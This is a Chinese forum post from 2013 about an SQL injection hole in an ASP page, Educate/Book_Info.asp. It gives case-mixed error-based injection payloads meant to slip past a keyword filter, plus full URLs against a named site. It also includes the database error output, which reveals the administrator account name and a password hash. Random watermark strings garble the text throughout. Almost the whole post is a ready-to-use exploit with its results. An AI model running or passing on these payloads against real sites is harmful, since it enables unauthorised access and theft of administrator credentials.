漏洞出现在Educate/Book_Info.asp
! ?' ~3 G) M+ s此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
6 T& D4 \& {1 V1 q; X y' dexp:如下
/ L" L/ R6 Z4 n查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)( f: p3 q- _, n* P0 K$ Q
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
/ V5 r7 B8 `1 n: Jhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)8 U0 K- l: P- L, L( h
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'1 }: |; m; e1 B
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
2 M6 Q7 r# [$ \* M/Educate/Book_Info.asp,行 8
7 \0 i. U9 W( L! x2 z Xhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)4 p# ], S' [2 b B
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'# [8 H2 x3 g$ E. ?- F9 k
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。4 v, ?% `! A$ Z% A. _* v* O
/Educate/Book_Info.asp,行 8 |
发表于 2013-2-13 23:56:06
收藏
支持
反对